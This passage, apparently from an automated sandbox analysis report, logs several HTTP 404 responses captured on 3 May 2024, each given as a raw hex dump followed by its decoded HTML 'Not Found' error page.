73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:52 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:56 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:18:59 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:19:02 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:19:07 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:19:10 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:19:13 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:19:16 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 72 75 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nrup/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 03 May 2024 18:19:21 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 03 May 2024 18:19:26 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 